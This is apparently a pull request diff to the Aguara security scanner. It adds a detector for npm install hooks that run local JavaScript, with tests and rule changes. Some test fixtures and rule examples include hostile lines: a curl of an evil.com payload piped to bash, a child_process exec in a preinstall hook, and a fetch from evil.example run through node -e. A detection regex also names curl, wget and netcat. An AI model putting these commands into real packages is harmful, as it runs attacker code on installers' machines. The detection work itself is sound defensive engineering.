### PR TITLE
Detect npm install hooks that run local JavaScript

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -39,3 +39,6 @@ coverage.out
 *.pem
 *.key
 /.nanostack/
+
+# Local Go build cache (created by sandboxed builds)
+.gocache/

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -4,7 +4,7 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
 
 ## Project Status
 
-Aguara v0.22.0 (2026-05-29). 193 YAML rules + 28 analyzer-emitted (221 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
+Aguara v0.22.0 (2026-05-29). 193 YAML rules + 29 analyzer-emitted (222 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
 
 Distribution: install.sh (mandatory checksum verification, bounded curl + retry), Homebrew tap, Docker (GHCR, multi-arch `linux/amd64+arm64`, runs as non-root UID 10001, base images digest-pinned, signed at digest with Cosign + SBOM + SLSA provenance attestations), GoReleaser (releases signed via Cosign keyless, SPDX SBOM per archive, `-trimpath` for reproducibility), GitHub Action, go install.
 
@@ -148,7 +148,7 @@ When completing a product task (fixing a bug, adding a feature, releasing a vers
 ### Data consistency rule
 
 When any of these values change, update ALL references across the vault:
-- Rule count (currently 193 YAML / 221 cataloged)
+- Rule count (currently 193 YAML / 222 cataloged)
 - Test count (currently ~750)
 - Coverage (currently 80%)
 - Star/fork count (currently 48/6)

--- a/README.md
+++ b/README.md
@@ -525,10 +525,10 @@ Supported directives:
 
 ## Rules
 
-Aguara currently exposes **221 cataloged detections** through `aguara list-rules`:
+Aguara currently exposes **222 cataloged detections** through `aguara list-rules`:
 
 - **193 embedded YAML pattern rules** across 13 categories
-- **28 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
+- **29 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
 
 The table groups coverage by emit-time category for readability:
 

--- a/aguara_test.go
+++ b/aguara_test.go
@@ -58,6 +58,174 @@ func TestScanContent(t *testing.T) {
 	}
 }
 
+// TestSupply026OwnsNpmLifecycle locks the MCP_008 -> SUPPLY_026 ownership
+// split: an npm package.json install-time hook that runs local JS must
+// surface as SUPPLY_026 (supply-chain), NOT MCP_008 (mcp-attack), while a
+// real MCP server manifest hook (init_script) still surfaces as MCP_008.
+// This guards the v0.22.x narrowing where preinstall/postinstall were
+// dropped from MCP_008 so an ordinary npm package stops drawing an
+// mcp-attack finding (and stops double-emitting).
+func TestSupply026OwnsNpmLifecycle(t *testing.T) {
+	cases := []struct {
+		name, filename, content string
+		want                    []string // all must be present
+		anyOf                   []string // at least one must be present
+		atMostOneOf             []string // no visible duplicate: at most one present
+		absent                  []string // none may be present
+	}{
+		{
+			name:     "preinstall node file -> SUPPLY_026 only",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"preinstall":"node index.js"}}`,
+			want:     []string{"SUPPLY_026"},
+			absent:   []string{"MCP_008"},
+		},
+		{
+			// SUPPLY_001 already owns preinstall + node -e; SUPPLY_026 also
+			// matches. Both are supply-chain HIGH on the same line, so dedup
+			// collapses them to a single finding (SUPPLY_001 wins). The
+			// user-visible contract: a supply-chain hit, no MCP_008, no
+			// duplicate.
+			name:        "preinstall node inline eval -> one supply-chain hit, deduped",
+			filename:    "package.json",
+			content:     `{"name":"x","version":"1.0.0","scripts":{"preinstall":"node -e \"require('child_process').exec('id')\""}}`,
+			anyOf:       []string{"SUPPLY_001", "SUPPLY_026"},
+			atMostOneOf: []string{"SUPPLY_001", "SUPPLY_026"},
+			absent:      []string{"MCP_008"},
+		},
+		{
+			// `prepare` is outside SUPPLY_001's preinstall/postinstall scope,
+			// so SUPPLY_026 owns inline node -e here with no dedup contest.
+			name:     "prepare node inline eval -> SUPPLY_026 specifically",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"prepare":"node --eval \"x\""}}`,
+			want:     []string{"SUPPLY_026"},
+			absent:   []string{"MCP_008", "SUPPLY_001"},
+		},
+		{
+			name:     "postinstall node mjs -> SUPPLY_026 only",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"postinstall":"node ./setup.mjs"}}`,
+			want:     []string{"SUPPLY_026"},
+			absent:   []string{"MCP_008"},
+		},
+		{
+			name:     "prepare bun run -> SUPPLY_026 only",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"prepare":"bun run index.js"}}`,
+			want:     []string{"SUPPLY_026"},
+			absent:   []string{"MCP_008"},
+		},
+		{
+			name:     "build node file -> neither (not a lifecycle hook)",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"build":"node index.js"}}`,
+			absent:   []string{"SUPPLY_026", "MCP_008"},
+		},
+		{
+			// Lifecycle-named key OUTSIDE the scripts object is not an npm
+			// auto-run hook; SUPPLY_026 is anchored to "scripts" so it does
+			// not fire here.
+			name:     "install key outside scripts object -> neither",
+			filename: "package.json",
+			content:  `{"config":{"install":"node index.js"},"prepare":"node x.js"}`,
+			absent:   []string{"SUPPLY_026", "MCP_008"},
+		},
+		{
+			name:     "postinstall husky -> neither",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"postinstall":"husky install"}}`,
+			absent:   []string{"SUPPLY_026", "MCP_008"},
+		},
+		{
+			name:     "preinstall only-allow -> neither",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"preinstall":"npx only-allow pnpm"}}`,
+			absent:   []string{"SUPPLY_026", "MCP_008"},
+		},
+		{
+			name:     "MCP manifest init_script node -> still MCP_008, not SUPPLY_026",
+			filename: "mcp-server.json",
+			content:  `{"init_script":"node server.js","on_start":"echo ok"}`,
+			want:     []string{"MCP_008"},
+			absent:   []string{"SUPPLY_026"},
+		},
+		{
+			// Non-package.json manifest with an npm-style lifecycle hook:
+			// MCP_008 still owns this (manifest tampering) because the
+			// !package.json exclusion only carves out package.json itself.
+			// SUPPLY_026 does not apply (it targets package.json only).
+			name:     "non-package.json manifest postinstall node -> MCP_008, not SUPPLY_026",
+			filename: "tool-manifest.json",
+			content:  `{"name":"srv","postinstall":"node backdoor.js"}`,
+			want:     []string{"MCP_008"},
+			absent:   []string{"SUPPLY_026"},
+		},
+		{
+			// The same hook in package.json flips ownership: SUPPLY_026, and
+			// MCP_008 is excluded by !package.json.
+			name:     "package.json postinstall node -> SUPPLY_026, MCP_008 excluded",
+			filename: "package.json",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"postinstall":"node backdoor.js"}}`,
+			want:     []string{"SUPPLY_026"},
+			absent:   []string{"MCP_008"},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			result, err := aguara.ScanContent(context.Background(), c.content, c.filename)
+			if err != nil {
+				t.Fatalf("ScanContent failed: %v", err)
+			}
+			got := map[string]bool{}
+			for _, f := range result.Findings {
+				got[f.RuleID] = true
+			}
+			for _, id := range c.want {
+				if !got[id] {
+					t.Errorf("expected %s, got findings %v", id, keysOf(got))
+				}
+			}
+			if len(c.anyOf) > 0 {
+				hit := false
+				for _, id := range c.anyOf {
+					if got[id] {
+						hit = true
+						break
+					}
+				}
+				if !hit {
+					t.Errorf("expected at least one of %v, got findings %v", c.anyOf, keysOf(got))
+				}
+			}
+			if len(c.atMostOneOf) > 0 {
+				n := 0
+				for _, id := range c.atMostOneOf {
+					if got[id] {
+						n++
+					}
+				}
+				if n > 1 {
+					t.Errorf("expected at most one of %v (no visible duplicate), got findings %v", c.atMostOneOf, keysOf(got))
+				}
+			}
+			for _, id := range c.absent {
+				if got[id] {
+					t.Errorf("did not expect %s, got findings %v", id, keysOf(got))
+				}
+			}
+		})
+	}
+}
+
+func keysOf(m map[string]bool) []string {
+	out := make([]string, 0, len(m))
+	for k := range m {
+		out = append(out, k)
+	}
+	return out
+}
+
 // TestScanContentAnalyzerRulesReachPublicAPI locks the pyrisk and rsbuild
 // analyzers into the library scanner. Their detections used to live as
 // co-presence YAML rules; once those were retired, the only thing keeping
@@ -75,6 +243,12 @@ func TestScanContentAnalyzerRulesReachPublicAPI(t *testing.T) {
 payload = requests.get("https://evil.example/p.js").text
 subprocess.run(["node", "-e", payload])
 `,
+		},
+		{
+			name:     "pkgmeta npm lifecycle local JS through public API",
+			filename: "package.json",
+			ruleID:   "SUPPLY_026",
+			content:  `{"name":"x","version":"1.0.0","scripts":{"preinstall":"node index.js"}}`,
 		},
 		{
 			name:     "rsbuild wallet read -> network through public API",
@@ -187,12 +361,12 @@ func TestListRulesIncludesAnalyzerRules(t *testing.T) {
 		ids[r.ID] = r.Analyzer
 	}
 	want := map[string]string{
-		"JS_DNS_TXT_EXFIL_001":  "jsrisk",
-		"GHA_PWN_REQUEST_001":   "ci-trust",
-		"NPM_LIFECYCLE_GIT_001": "pkgmeta",
-		"TOXIC_001":             "toxicflow",
+		"JS_DNS_TXT_EXFIL_001":   "jsrisk",
+		"GHA_PWN_REQUEST_001":    "ci-trust",
+		"NPM_LIFECYCLE_GIT_001":  "pkgmeta",
+		"TOXIC_001":              "toxicflow",
 		"NLP_HIDDEN_INSTRUCTION": "nlp",
-		"RUGPULL_001":           "rugpull",
+		"RUGPULL_001":            "rugpull",
 	}
 	for id, analyzer := range want {
 		got, ok := ids[id]

--- a/internal/engine/pattern/matcher.go
+++ b/internal/engine/pattern/matcher.go
@@ -15,7 +15,6 @@ import (
 // ctxRadius is the number of context lines before and after a match.
 const ctxRadius = 3
 
-
 // Matcher implements the Analyzer interface using compiled pattern rules.
 // Rules are pre-grouped by target extension for fast lookup.
 // Contains patterns use Aho-Corasick multi-pattern matching for O(n+m) search.
@@ -182,7 +181,34 @@ func (m *Matcher) rulesForFile(relPath string) []*rules.CompiledRule {
 	if rules, ok := m.byExt[base]; ok {
 		result = append(result, rules...)
 	}
-	return result
+
+	// Apply `!`-prefixed exclude targets: a rule scoped broadly (e.g.
+	// *.json) can carve out a file owned by a more specific rule
+	// (e.g. !package.json). Filter in place; order is preserved.
+	kept := result[:0]
+	for _, r := range result {
+		if len(r.ExcludeTargets) > 0 && fileMatchesAnyGlob(r.ExcludeTargets, relPath, base) {
+			continue
+		}
+		kept = append(kept, r)
+	}
+	return kept
+}
+
+// fileMatchesAnyGlob reports whether relPath or its basename matches any
+// of the globs. Used for `!`-prefixed exclude targets; the simple
+// filepath.Match path is enough for the literal-filename and `*.ext`
+// exclusions rules use (no `**` support needed here).
+func fileMatchesAnyGlob(globs []string, relPath, base string) bool {
+	for _, g := range globs {
+		if matched, _ := filepath.Match(g, relPath); matched {
+			return true
+		}
+		if matched, _ := filepath.Match(g, base); matched {
+			return true
+		}
+	}
+	return false
 }
 
 func (m *Matcher) matchAny(rule *rules.CompiledRule, content, lowerContent string, lines []string, target *scanner.Target, cbMap []bool) []scanner.Finding {

--- a/internal/engine/pkgmeta/metadata.go
+++ b/internal/engine/pkgmeta/metadata.go
@@ -39,6 +39,26 @@ func RuleMetadata() []rulemeta.Rule {
 				"the dependency mandatory so its install behaviour is auditable.",
 		},
 		{
+			ID:       RuleLocalJSLifecycle,
+			Name:     "npm lifecycle script executes local JavaScript",
+			Severity: "HIGH",
+			Category: "supply-chain",
+			Analyzer: rulemeta.AnalyzerPkgMeta,
+			Description: "package.json defines an install-time lifecycle script (preinstall, " +
+				"install, postinstall, preprepare, prepare, postprepare, prepublish, prepack, " +
+				"postpack) whose body runs Node or Bun on local JavaScript: node index.js, " +
+				"node ./scripts/setup.mjs, node -e/--eval, bun run x, or bun ./setup.mjs. npm " +
+				"runs these hooks automatically on install, so executing the package's own JS " +
+				"is the first hop of supply-chain droppers like the Red Hat/Miasma worm, which " +
+				"shipped a preinstall hook running node index.js. Detection walks the parsed " +
+				"scripts object, so a same-named key elsewhere in the manifest and brace-bearing " +
+				"shell expansions in sibling scripts do not cause a false positive or a miss.",
+			Remediation: "Install-time code execution should be unnecessary for most packages. " +
+				"Read the referenced script in a clean clone before installing, prefer packages " +
+				"with no install/preinstall/postinstall hooks, pin the dependency to a reviewed " +
+				"version, and install with --ignore-scripts where possible.",
+		},
+		{
 			ID:       RulePublishSurface,
 			Name:     "publishConfig + install/build/test + trusted publishing reference",
 			Severity: "HIGH",

--- a/internal/engine/pkgmeta/npm.go
+++ b/internal/engine/pkgmeta/npm.go
@@ -29,9 +29,48 @@ const AnalyzerName = "pkgmeta"
 
 // Rule IDs emitted by this analyzer.
 const (
-	RuleLifecycleGit    = "NPM_LIFECYCLE_GIT_001"
-	RuleOptionalGit     = "NPM_OPTIONAL_GIT_001"
-	RulePublishSurface  = "NPM_PUBLISH_SURFACE_001"
+	RuleLifecycleGit     = "NPM_LIFECYCLE_GIT_001"
+	RuleOptionalGit      = "NPM_OPTIONAL_GIT_001"
+	RulePublishSurface   = "NPM_PUBLISH_SURFACE_001"
+	RuleLocalJSLifecycle = "SUPPLY_026"
+)
+
+// localJSLifecycleKeys are the lifecycle hooks where a package running its
+// own JavaScript is the supply-chain risk. preinstall/install/postinstall
+// and the prepare family run automatically during `npm install`;
+// prepublish runs on install for git deps; prepack/postpack are pack/
+// publish-time but kept here because running local JS at pack time is the
+// same execute-on-the-maintainer risk. The Red Hat/Miasma dropper shipped
+// a preinstall hook running `node index.js`.
+var localJSLifecycleKeys = []string{
+	"preinstall", "install", "postinstall",
+	"preprepare", "prepare", "postprepare",
+	"prepublish", "prepack", "postpack",
+}
+
+// Script-value classifiers for SUPPLY_026. They run against the PARSED
+// script string (not the raw JSON), so a brace-bearing shell expansion in a
+// sibling script and a same-named key outside the scripts object can never
+// cause a miss or a false positive — the failure modes a flat regex over
+// package.json has.
+var (
+	// node running a local JS file: `node … x.js|.cjs|.mjs`. `[^"']*`
+	// (not `[^\s'"]*`) lets flags sit between node and the entrypoint, so
+	// `node --require dotenv/config ./index.js` still matches; it stays
+	// quote-bounded so it does not run past the script value. `node
+	// --version` has no .js and does not match.
+	reNodeLocalJS = regexp.MustCompile(`(?i)\bnode\s+[^"']*\.[cm]?js\b`)
+	// node running an extensionless local path entrypoint: `node
+	// ./scripts/setup`, `node dist/main`, `node /tmp/x` (node executes
+	// extensionless files as JS). Requires a path separator in a non-flag
+	// argument so `node --version` and bare subcommand-style words do not
+	// match. Flags before the entrypoint are allowed.
+	reNodeLocalPath = regexp.MustCompile(`(?i)\bnode\s+(?:--?\S+\s+)*[^\s"'-][^\s"']*/`)
+	// node inline eval.
+	reNodeEval = regexp.MustCompile(`(?i)\bnode\s+(?:--eval|-e)\b`)
+	// bun second stage: run, a local JS file (flags allowed before it),
+	// or inline eval.
+	reBunExec = regexp.MustCompile(`(?i)\bbun\s+(?:run\b|--eval\b|-e\b|[^"']*\.[cm]?js\b)`)
 )
 
 // Analyzer implements scanner.Analyzer for npm package metadata.
@@ -561,7 +600,68 @@ func detect(pkg *manifest) []types.Finding {
 	if f := detectPublishSurface(pkg); f != nil {
 		out = append(out, *f)
 	}
+	out = append(out, detectLocalJSLifecycle(pkg)...)
 	return out
+}
+
+// detectLocalJSLifecycle emits SUPPLY_026 for each lifecycle script whose
+// body runs Node or Bun on local JavaScript (a .js/.cjs/.mjs file or an
+// -e/--eval inline payload). This is the analyzer home for the rule that
+// previously lived as a flat YAML regex: walking the parsed scripts map
+// is structurally correct where a regex over the raw manifest is not.
+func detectLocalJSLifecycle(pkg *manifest) []types.Finding {
+	if len(pkg.Scripts) == 0 {
+		return nil
+	}
+	var findings []types.Finding
+	for _, key := range localJSLifecycleKeys {
+		body, ok := pkg.Scripts[key]
+		if !ok {
+			continue
+		}
+		body = strings.TrimSpace(body)
+		runtime := localJSRuntime(body)
+		if runtime == "" {
+			continue
+		}
+		findings = append(findings, types.Finding{
+			RuleID:   RuleLocalJSLifecycle,
+			RuleName: "npm lifecycle script executes local JavaScript",
+			Severity: types.SeverityHigh,
+			Category: "supply-chain",
+			Description: "package.json runs " + runtime + " on local JavaScript from the `" + key +
+				"` lifecycle script, which npm executes automatically during install. " +
+				"Install-time execution of a package's own JS is the first hop of supply-chain " +
+				"droppers; the Red Hat/Miasma worm shipped a preinstall hook running `node index.js`.",
+			FilePath: pkg.path,
+			// Scope the line lookup to the scripts object so a same-named
+			// key elsewhere (a dependency or config key called "install")
+			// does not anchor the finding to an unrelated earlier line.
+			Line:        findDepLine(pkg.raw, "scripts", key),
+			MatchedText: key + " = " + body,
+			Analyzer:    AnalyzerName,
+			Confidence:  0.9,
+			Remediation: "Install-time code execution should be unnecessary for most packages. " +
+				"Read the referenced script in a clean clone before installing, prefer packages " +
+				"with no install/preinstall/postinstall hooks, pin the dependency to a reviewed " +
+				"version, and install with --ignore-scripts where possible.",
+		})
+	}
+	return findings
+}
+
+// localJSRuntime returns "node" or "bun" when body runs that runtime on
+// local JS (a file or an inline -e/--eval payload), or "" otherwise. node
+// --version, husky install, npx-only, and build/test commands return "".
+func localJSRuntime(body string) string {
+	switch {
+	case reNodeLocalJS.MatchString(body), reNodeEval.MatchString(body), reNodeLocalPath.MatchString(body):
+		return "node"
+	case reBunExec.MatchString(body):
+		return "bun"
+	default:
+		return ""
+	}
 }
 
 // detectLifecycleGit emits NPM_LIFECYCLE_GIT_001 for each git-sourced
@@ -647,7 +747,7 @@ func detectOptionalGit(pkg *manifest) []types.Finding {
 				"). Optional dependencies install silently when resolution succeeds, so a " +
 				"mutable git ref here is a quieter supply-chain entry point than the same " +
 				"shape in dependencies.",
-			FilePath:    pkg.path,
+			FilePath: pkg.path,
 			// Per-dep line anchor, scoped to optionalDependencies so a
 			// dep name that also appears as the package "name" or as a
 			// script key does not anchor to the wrong line.

--- a/internal/engine/pkgmeta/npm_test.go
+++ b/internal/engine/pkgmeta/npm_test.go
@@ -1072,8 +1072,11 @@ func TestFindingsHaveStableFields(t *testing.T) {
 		if f.Category != "supply-chain" {
 			t.Errorf("finding %s: category = %q, want supply-chain", f.RuleID, f.Category)
 		}
-		if !strings.HasPrefix(f.RuleID, "NPM_") {
-			t.Errorf("finding ruleID %q should have NPM_ prefix", f.RuleID)
+		// pkgmeta emits the NPM_* chain rules plus SUPPLY_026 (npm
+		// lifecycle runs local JS), which was moved here from a flat
+		// YAML rule.
+		if !strings.HasPrefix(f.RuleID, "NPM_") && f.RuleID != RuleLocalJSLifecycle {
+			t.Errorf("finding ruleID %q should be an NPM_* rule or %s", f.RuleID, RuleLocalJSLifecycle)
 		}
 		if f.Confidence == 0 {
 			t.Errorf("finding %s: confidence should be > 0", f.RuleID)
@@ -1084,5 +1087,77 @@ func TestFindingsHaveStableFields(t *testing.T) {
 		if f.FilePath != "package.json" {
 			t.Errorf("finding %s: file path = %q, want package.json", f.RuleID, f.FilePath)
 		}
+	}
+}
+
+// TestLocalJSLifecycle_SUPPLY026 covers the rule moved here from a flat
+// YAML regex. Walking the parsed scripts map fixes the two failure modes
+// the regex had: a `}` in a sibling script value (brace case) and a
+// same-named key outside the scripts object (FP case).
+func TestLocalJSLifecycle_SUPPLY026(t *testing.T) {
+	cases := []struct {
+		name    string
+		content string
+		want    bool
+	}{
+		{"preinstall node file", `{"scripts":{"preinstall":"node index.js"}}`, true},
+		{"install node mjs", `{"scripts":{"install":"node ./scripts/setup.mjs"}}`, true},
+		{"postinstall node cjs", `{"scripts":{"postinstall":"node scripts/install.cjs"}}`, true},
+		{"preinstall node inline eval", `{"scripts":{"preinstall":"node -e \"require('child_process').exec('id')\""}}`, true},
+		{"prepare bun run", `{"scripts":{"prepare":"bun run index.js"}}`, true},
+		{"postinstall bun file", `{"scripts":{"postinstall":"bun ./setup.mjs"}}`, true},
+		{"preprepare node (bypass key)", `{"scripts":{"preprepare":"node x.js"}}`, true},
+		{"shell-prefixed node", `{"scripts":{"postinstall":"cd lib && node build.js"}}`, true},
+		{"node with flags before file", `{"scripts":{"postinstall":"node --require dotenv/config ./index.js"}}`, true},
+		{"extensionless node path", `{"scripts":{"preinstall":"node ./scripts/setup"}}`, true},
+		{"extensionless bare relative path", `{"scripts":{"postinstall":"node dist/main"}}`, true},
+		// codex #2: a brace-bearing shell expansion in an earlier script
+		// must not hide a later malicious hook (the regex `[^}]*` failed here).
+		{"brace in sibling script", `{"scripts":{"prebuild":"echo ${npm_package_name}","postinstall":"node index.js"}}`, true},
+		// false positives
+		{"build is not a lifecycle hook", `{"scripts":{"build":"node index.js"}}`, false},
+		{"test is not a lifecycle hook", `{"scripts":{"test":"node test.js"}}`, false},
+		{"husky", `{"scripts":{"postinstall":"husky install"}}`, false},
+		{"only-allow", `{"scripts":{"preinstall":"npx only-allow pnpm"}}`, false},
+		{"node version probe", `{"scripts":{"postinstall":"node --version"}}`, false},
+		// codex #2 FP: lifecycle-named key OUTSIDE the scripts object.
+		{"install key under config", `{"config":{"install":"node index.js"}}`, false},
+		{"no scripts at all", `{"name":"x","version":"1.0.0"}`, false},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			got := hasRule(analyze(t, "package.json", c.content), RuleLocalJSLifecycle)
+			if got != c.want {
+				t.Errorf("SUPPLY_026 present = %v, want %v", got, c.want)
+			}
+		})
+	}
+}
+
+// TestLocalJSLifecycle_LineAnchoredToScripts locks the line anchor to the
+// scripts entry, not a same-named key earlier in the manifest.
+func TestLocalJSLifecycle_LineAnchoredToScripts(t *testing.T) {
+	content := "{\n" + // line 1
+		"  \"dependencies\": {\n" + // 2
+		"    \"install\": \"^1.0.0\"\n" + // 3 (decoy: dep named "install")
+		"  },\n" + // 4
+		"  \"scripts\": {\n" + // 5
+		"    \"install\": \"node index.js\"\n" + // 6 (the real hook)
+		"  }\n" + // 7
+		"}" // 8
+	findings := analyze(t, "package.json", content)
+	var line int
+	found := false
+	for _, f := range findings {
+		if f.RuleID == RuleLocalJSLifecycle {
+			line, found = f.Line, true
+			break
+		}
+	}
+	if !found {
+		t.Fatalf("expected SUPPLY_026, got %+v", findings)
+	}
+	if line != 6 {
+		t.Errorf("SUPPLY_026 line = %d, want 6 (scripts entry, not the dep on line 3)", line)
 	}
 }

--- a/internal/rules/builtin/mcp-attack.yaml
+++ b/internal/rules/builtin/mcp-attack.yaml
@@ -156,10 +156,10 @@ examples:
 ---
 id: MCP_008
 name: "Server manifest tampering"
-description: "Detects lifecycle hooks with shell commands in server manifests"
+description: "Detects lifecycle hooks with shell commands in MCP server manifests (preinstall, postinstall, init_script, on_start, on_connect, preload, lifecycle). package.json is excluded via the !package.json target: install-time JS execution in package.json is owned by SUPPLY_026 (supply-chain) so an ordinary npm package does not draw an mcp-attack finding, while a non-package.json manifest (e.g. an MCP tool manifest) with a tampered lifecycle hook is still caught here."
 severity: CRITICAL
 category: mcp-attack
-targets: ["*.json", "*.yaml", "*.yml"]
+targets: ["*.json", "*.yaml", "*.yml", "!package.json"]
 match_mode: any
 remediation: "Remove shell commands from lifecycle hooks. Pin server versions and verify manifest integrity with checksums."
 patterns:

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -7,15 +7,17 @@ targets: ["package.json"]
 match_mode: any
 patterns:
   - type: regex
-    value: "(?i)[\"'](preinstall|postinstall|preuninstall)[\"']\\s*:\\s*[\"'][^\"']*(curl|wget|bash|sh |powershell|node -e|python|eval|nc |ncat)[^\"']*[\"']"
+    value: "(?i)[\"'](preinstall|postinstall|preuninstall)[\"']\\s*:\\s*[\"'][^\"']*(curl|wget|bash|sh |powershell|node -e|python|eval|nc |ncat|exec )[^\"']*[\"']"
 remediation: "Pin the download URL to a specific version and verify checksums. Avoid curl-pipe-shell patterns."
 examples:
   true_positive:
     - "\"preinstall\": \"curl http://evil.com/payload.sh | bash\""
     - "\"postinstall\": \"node -e \\\"require('child_process').exec('curl evil.com')\\\"\""
+    - "\"postinstall\": \"exec ./payload\""
   false_positive:
     - "\"postinstall\": \"husky install\""
     - "\"preinstall\": \"npx only-allow pnpm\""
+    - "\"postinstall\": \"execa ./tasks.js\""
 ---
 id: SUPPLY_002
 name: "Python setup.py execution"

--- a/internal/rules/compiler.go
+++ b/internal/rules/compiler.go
@@ -33,17 +33,33 @@ func Compile(raw RawRule) (*CompiledRule, error) {
 		mode = MatchAll
 	}
 
+	// Split `targets` into positive globs and `!`-prefixed exclusions.
+	// Positive globs drive ext-indexing in the matcher; exclusions are
+	// applied at match time so a rule scoped to *.json can opt out of a
+	// specific file (e.g. package.json) owned by a more specific rule.
+	var targets, excludeTargets []string
+	for _, t := range raw.Targets {
+		if strings.HasPrefix(t, "!") {
+			if ex := strings.TrimPrefix(t, "!"); ex != "" {
+				excludeTargets = append(excludeTargets, ex)
+			}
+			continue
+		}
+		targets = append(targets, t)
+	}
+
 	compiled := &CompiledRule{
-		ID:          raw.ID,
-		Name:        raw.Name,
-		Description: raw.Description,
-		Severity:    sev,
-		Category:    raw.Category,
-		Targets:     raw.Targets,
-		MatchMode:   mode,
-		Sensitive:   raw.Sensitive,
-		Remediation: raw.Remediation,
-		Examples:    raw.Examples,
+		ID:             raw.ID,
+		Name:           raw.Name,
+		Description:    raw.Description,
+		Severity:       sev,
+		Category:       raw.Category,
+		Targets:        targets,
+		ExcludeTargets: excludeTargets,
+		MatchMode:      mode,
+		Sensitive:      raw.Sensitive,
+		Remediation:    raw.Remediation,
+		Examples:       raw.Examples,
 	}
 
 	for i, p := range raw.Patterns {

--- a/internal/rules/rule.go
+++ b/internal/rules/rule.go
@@ -66,12 +66,18 @@ type CompiledPattern struct {
 
 // CompiledRule is a rule compiled and ready for execution.
 type CompiledRule struct {
-	ID              string
-	Name            string
-	Description     string
-	Severity        types.Severity
-	Category        string
-	Targets         []string
+	ID          string
+	Name        string
+	Description string
+	Severity    types.Severity
+	Category    string
+	Targets     []string
+	// ExcludeTargets are file globs that suppress the rule even when a
+	// positive Target (or no target) would otherwise match. Authored in
+	// YAML as `!`-prefixed entries in `targets` (e.g. "!package.json").
+	// Lets a broadly-scoped rule (targets: *.json) carve out a file that
+	// a more specific rule owns, without per-file content heuristics.
+	ExcludeTargets  []string
 	MatchMode       MatchMode
 	Sensitive       bool
 	Patterns        []CompiledPattern

--- a/internal/rules/rules_test.go
+++ b/internal/rules/rules_test.go
@@ -32,6 +32,42 @@ func TestCompileValidRule(t *testing.T) {
 	require.Equal(t, "hello world", compiled.Patterns[1].Value) // lowercased
 }
 
+func TestCompileTargetNegation(t *testing.T) {
+	// `!`-prefixed targets are split into ExcludeTargets; positive globs
+	// stay in Targets. Order between positive and negative is irrelevant.
+	raw := rules.RawRule{
+		ID:        "TEST_NEG",
+		Name:      "Negation",
+		Severity:  "HIGH",
+		Category:  "test",
+		MatchMode: "any",
+		Targets:   []string{"*.json", "!package.json", "*.yaml", "!"},
+		Patterns:  []rules.RawPattern{{Type: rules.PatternContains, Value: "x"}},
+	}
+	compiled, err := rules.Compile(raw)
+	require.NoError(t, err)
+	require.Equal(t, []string{"*.json", "*.yaml"}, compiled.Targets)
+	// bare "!" is ignored (no filename), only "package.json" is excluded.
+	require.Equal(t, []string{"package.json"}, compiled.ExcludeTargets)
+}
+
+func TestCompileNoNegationUnchanged(t *testing.T) {
+	// A rule with no `!` entries keeps Targets intact and has no exclusions.
+	raw := rules.RawRule{
+		ID:        "TEST_PLAIN",
+		Name:      "Plain",
+		Severity:  "HIGH",
+		Category:  "test",
+		MatchMode: "any",
+		Targets:   []string{"*.json", "*.yaml"},
+		Patterns:  []rules.RawPattern{{Type: rules.PatternContains, Value: "x"}},
+	}
+	compiled, err := rules.Compile(raw)
+	require.NoError(t, err)
+	require.Equal(t, []string{"*.json", "*.yaml"}, compiled.Targets)
+	require.Empty(t, compiled.ExcludeTargets)
+}
+
 func TestCompileMatchAll(t *testing.T) {
 	raw := rules.RawRule{
 		ID:        "TEST_002",

--- a/internal/scanner/eval_test.go
+++ b/internal/scanner/eval_test.go
@@ -203,7 +203,11 @@ func buildScenarios(testdataDir string) []benchmarkScenario {
 		"mcp-tool-poisoning":     {"MCP_001", "MCP_005", "MCP_006", "MCP_008", "PROMPT_INJECTION_001", "SUPPLY_003"},
 		"prompt-injection-basic": {"PROMPT_INJECTION_001", "PROMPT_INJECTION_005", "PROMPT_INJECTION_006", "PROMPT_INJECTION_008"},
 		"ssrf-metadata":          {"SSRF_001", "SSRF_003", "SSRF_004", "SSRF_005", "SSRF_007"},
-		"supply-chain-attack":    {"SUPPLY_002", "SUPPLY_003", "SUPPLY_006", "SUPPLY_007", "SUPPLY_008", "MCP_008"},
+		// MCP_008 (manifest tampering) is intentionally NOT expected here:
+		// the lifecycle hook lives in package.json, which is owned by the
+		// supply-chain rules (SUPPLY_001/026). MCP_008 now excludes
+		// package.json via its !package.json target.
+		"supply-chain-attack":    {"SUPPLY_001", "SUPPLY_002", "SUPPLY_003", "SUPPLY_006", "SUPPLY_007", "SUPPLY_008"},
 		"unicode-obfuscation":    {"UNI_001", "UNI_002", "UNI_003", "UNI_004", "UNI_005", "UNI_006", "UNI_007"},
 	}
 


### PR DESCRIPTION
## What

This PR improves how Aguara detects the first step of many npm supply-chain attacks: install hooks that run package code.

